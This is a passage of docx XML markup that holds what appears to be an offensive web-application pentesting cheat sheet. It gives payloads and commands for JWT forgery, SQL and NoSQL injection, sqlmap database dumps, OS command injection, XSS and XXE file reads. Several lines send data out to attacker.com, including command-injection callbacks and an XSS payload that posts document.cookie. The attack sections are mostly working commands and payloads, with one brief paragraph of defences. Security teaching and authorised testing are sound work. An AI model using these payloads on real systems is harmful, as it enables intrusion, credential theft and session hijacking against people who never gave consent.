      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Spider the application for exposed sensitive files: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ffuf -u https://target.com/FUZZ -w sensitive_files.txt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Wordlist should include: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.env, id_rsa, private.key, certificate.pem, config.php</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database.yml, settings.py, secrets.json, credentials.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Check source code and JS bundles for hardcoded secrets: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In browser DevTools → Sources tab → search all JS files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grep -rn "password\|secret\|api_key\|token\|private" ./js/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Use truffleHog or gitleaks if you find a .git directory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trufflehog filesystem ./target_source/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gitleaks detect --source . --verbose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2.3 JWT (JSON Web Token) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JWTs are widely used for authentication. When implemented incorrectly they are completely bypassable. There are multiple distinct attack vectors against JWTs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Decode and inspect the JWT (do this first every time):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JWT format: header.payload.signature (all base64url encoded)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echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d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Or use jwt.io to decode visually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Check: algorithm, expiry (exp), user role claims, issuer (iss)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 1 — Algorithm None (alg:none bypass):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jwt_tool TOKEN -X a</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Removes signature requirement entirely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Works when server accepts unsigned tokens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Manually: set alg to "none", remove signature, keep trailing dot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eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 2 — RS256 to HS256 confusion (public key as HMAC secret):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1. Obtain the server's RSA public key (often at /jwks.json or /.well-known/)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curl https://target.com/.well-known/jwks.json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2. Sign a forged token using the public key as HMAC-SHA256 secret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jwt_tool TOKEN -X k -pk server_public.pem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3. Server verifies with public key thinking it's RS256, but you signed with HS256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 3 — Weak secret brute-force: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jwt_tool TOKEN -C -d /usr/share/wordlists/rockyou.txt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hashcat -a 0 -m 16500 token.jwt rockyou.txt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Common weak secrets: secret, password, 123456, your_app_name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 4 — Kid (Key ID) header injection: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kid header tells server where to find the signing key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Inject SQLi into kid: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{"kid": "x' UNION SELECT 'attacker_secret'--", "alg": "HS256"}</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Now sign with "attacker_secret" — server queries your injected key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Path traversal in kid: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{"kid": "../../dev/null", "alg": "HS256"}</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Sign with empty string — /dev/null is empty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 5 — Token expiry abuse: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Check "exp" claim — some apps don't validate expiry server-side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Remove exp claim or set to year 2099 and see if token still works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jwt_tool TOKEN -I -pc exp -pv 9999999999</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2.4 Weak Password Hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">If you dump a database, identify hash type and crack:</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MD5: 32 hex chars e.g. 5f4dcc3b5aa765d61d8327deb882cf99</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SHA1: 40 hex chars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BCrypt: starts with $2y$ or $2b$</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Identify with hash-identifier or hashid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hashid "5f4dcc3b5aa765d61d8327deb882cf99"</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hashcat -a 0 -m 0 hashes.txt rockyou.txt       # MD5</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hashcat -a 0 -m 100 hashes.txt rockyou.txt     # SHA1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hashcat -a 0 -m 3200 hashes.txt rockyou.txt    # BCrypt (slow)</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2.5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Use TLS 1.2+ everywhere with HSTS. Use bcrypt/scrypt/Argon2 for passwords — never MD5 or SHA1. Use strong, randomly generated JWT secrets (256+ bit). Validate the JWT algorithm server-side (never accept "none"). Store secrets in environment variables or a vault, never in code. Encrypt sensitive data at rest using AES-256.</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A03 —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22B21" w:sz="6"/>
              <w:left w:val="single" w:color="922B21" w:sz="6"/>
              <w:bottom w:val="single" w:color="922B21" w:sz="6"/>
              <w:right w:val="single" w:color="922B21" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="922B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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="922B21" w:sz="4"/>
              <w:left w:val="single" w:color="922B21" w:sz="4"/>
              <w:bottom w:val="single" w:color="922B21" w:sz="4"/>
              <w:right w:val="single" w:color="922B21" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FADBD8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. SQL, NoSQL, OS, LDAP, and XSS all fall under this category.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection is the broadest and most dangerous category. Any time user input is passed to an interpreter without proper sanitization or parameterization, injection is possible. This section covers SQL injection, NoSQL injection, OS command injection, LDAP injection, XSS, and XXE.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3.1 SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection allows an attacker to interfere with the queries an application makes to its database. It can allow an attacker to view, modify, and delete data they should not have access to. In some cases it leads to complete operating system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection — manual testing payloads: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 Syntax error? Might be injectable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OR '1'='1               → Classic auth bypass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OR 1=1--                → Comment-based bypass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1' AND SLEEP(5)--         → Time-based blind detection (MySQL)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1; WAITFOR DELAY '0:0:5'--  → Time-based (MSSQL)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AND pg_sleep(5)--       → Time-based (PostgreSQL)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AND 1=CONVERT(int,'a')-- → Error-based (MSSQL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based extraction — find number of columns first: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ORDER BY 1--   ' ORDER BY 2--   ' ORDER BY 3--</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When ORDER BY N causes error, N-1 is the column count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UNION SELECT NULL,NULL,NULL--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UNION SELECT 1,2,3--</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UNION SELECT username,password,3 FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap — automated exploitation (use after manual confirmation):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sqlmap -u "https://target.com/item?id=1" --dbs --batch --level=5 --risk=3</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sqlmap -u "https://target.com/item?id=1" -D dbname --tables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sqlmap -u "https://target.com/item?id=1" -D dbname -T users --dump</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POST body injection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sqlmap -u "https://target.com/login" --data="user=admin&amp;pass=test" --level=5</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Authenticated session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sqlmap -u "https://target.com/api" --cookie="session=abc123" --dbs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JSON body injection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sqlmap -u "https://target.com/api/search" --data='{"q":"test"}'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--headers="Content-Type: application/json" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQLi — Out-of-Band (when no response is visible):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DNS OOB exfiltration (MSSQL):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exec master..xp_dirtree '//YOUR.BURPCOLLABORATOR.NET/a'--</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MySQL OOB:</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UNION SELECT LOAD_FILE(CONCAT('\\\\',version(),'.attacker.com\\a'))--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Second-Order SQLi — inject now, trigger later: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Register username: admin'--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Application stores it safely in DB (no immediate error)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When profile page uses stored value in query: SELECT * FROM users WHERE name='admin'--'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The comment terminates the query — admin access achieved</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3.2 NoSQL Injection (MongoDB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL databases like MongoDB use query operators ($gt, $ne, $where) that can be injected. The attack is conceptually similar to SQLi but uses JSON operators instead of SQL syntax.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication bypass — operator injection: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Login endpoint expecting JSON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{"username": {"$gt": ""}, "password": {"$gt":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$gt:"" matches any non-empty string — bypasses auth completely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{"username": "admin", "password": {"$ne": "wrong"}}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$ne: "not equal" — any password that is NOT "wrong" → matches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">URL parameter injection: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https://target.com/login?user[$ne]=x&amp;pass[$ne]=x</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https://target.com/users?id[$gt]=0&amp;id[$lt]=9999</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$where operator injection (JavaScript execution):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{"$where": "sleep(5000)"}        → Blind time-based detection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{"$where": "return true"}        → Bypass condition</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3.3 OS Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command injection allows execution of arbitrary OS commands on the host server. This occurs when user input is passed to a system shell without proper sanitization. Typically leads to full RCE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection payloads — inject in any field that might hit the OS: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whoami</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whoami</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`whoami`</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$(whoami)</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&amp; whoami &amp;</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sleep 5           ← time-based blind detection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ping -c 5 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Common injection points to test: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File conversion/processing endpoints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Image resize / thumbnail generation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DNS lookup / ping / traceroute tools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Report generation (PDF/Excel converters)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SSH key imports, IP validation fields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filename=../../etc/passwd%00.jpg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind command injection — out-of-band confirmation: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Your server must be listening (use interactsh or Burp Collaborator)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curl http://YOUR.INTERACTSH.SERVER/$(whoami)</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nslookup $(whoami).attacker.com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wget http://attacker.com/`id`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated testing with commix:</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commix --url="https://target.com/ping?host=INJECT_HERE"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commix --url="https://target.com/scan" --data="ip=INJECT_HERE"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commix --url="https://target.com/" --cookie="host=INJECT_HERE"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3.4 XSS — Cross-Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS allows attackers to inject malicious scripts into content that is viewed by other users. There are three types: Reflected (not stored), Stored (persisted in DB), and DOM-based (client-side only, no server trip).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic detection payloads: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&lt;script&gt;alert(1)&lt;/script&gt;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"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;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'&gt;&lt;img src=x onerror=alert(1)&gt;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&lt;svg onload=alert(1)&gt;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javascript:alert(1)              ← in href/src attributes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie theft — upgrade from alert to real impact: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&lt;script&gt;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fetch("https://attacker.com/?c=" + document.cookie)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&lt;/script&gt;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Or with XHR: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&lt;script&gt;new Image().src="https://attacker.com/?c="+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CSP bypass — AngularJS sandbox escape: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{{constructor.constructor("alert(1)")()}}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&lt;script src="https://trusted-cdn.com/angular.min.js"&gt;&lt;/script&gt;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{{$eval.constructor("alert(1)")()}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM-based XSS — look at JavaScript sinks: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Vulnerable sinks: innerHTML, outerHTML, document.write()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eval(), setTimeout(), setInterval() with user input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location.href, location.hash read by JS without encoding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Test URL: https://target.com/page#&lt;img src=x onerror=alert(1)&gt;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Test URL: https://target.com/?search=&lt;svg/onload=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated XSS scanning — dalfox:</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dalfox url "https://target.com/search?q=FUZZ"</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dalfox url "https://target.com/comment" -X POST -d "msg=FUZZ"</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dalfox file urls.txt --skip-bav</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3.5 XXE — XML External Entity Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. It can lead to file disclosure, SSRF, and in some cases remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic XXE — read /etc/passwd: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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE root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&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;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&lt;data&gt;&amp;xxe;&lt;/data&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
